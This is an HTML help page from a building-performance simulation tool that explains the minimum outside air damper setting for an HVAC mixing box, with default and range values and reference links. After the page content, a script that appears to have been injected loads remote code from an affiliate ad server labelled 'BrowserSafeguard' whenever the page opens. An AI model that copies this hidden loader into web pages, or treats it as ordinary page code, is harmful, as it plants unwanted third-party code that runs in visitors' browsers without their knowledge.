﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>MINIMUM OUTSIDE AIR DAMPER POSITION</h1>
<h3>Associated System: Mixing Box</h3>
<div class="graphic"> <img src="../HVAC AHU & Ducts/PistonGate.png" alt=""/ ></div>    
<p>This parameter sets the minimum amount of air required for proper ventilation of a building. Some buildings require a certain amount of air changes of outdoor air. The minimum air changes are determined by the type and location of a building and the expected number of occupants. If a building has air-side economizers, the amount of outdoor air within the building will be adjusted by increasing or decreasing the economizer's dampers in order to take advantage of "free-cooling".  During periods when the outdoor is outside of a desirable range, the outdoor air dampers when return to their minimum setting.</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>Adjusting this value changes the minimum outdoor air setting for the building. It also affects the amount of heating and cooling required if the building uses air-side economizers.</p>      
<h4>The value of this variable can be adjusted during a simulation run-time.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> 0.1</li>
<li><label>Minimum:</label> 0</li>
<li><label>Maximum:</label> 10</li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> %</li>
<li><label>SI Units:</label> %</li>      </ul>
<h2>Related Items: </h2>
<ul></ul>
<h2>Links:</h2>
<ul>
<li><a href="http://www.energystar.gov/index.cfm?c=power_mgt.datacenter_efficiency_economizer_airside" target="_blank">http://www.energystar.gov/index.cfm?c=power_mgt.datacenter_efficiency_economizer_airside</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
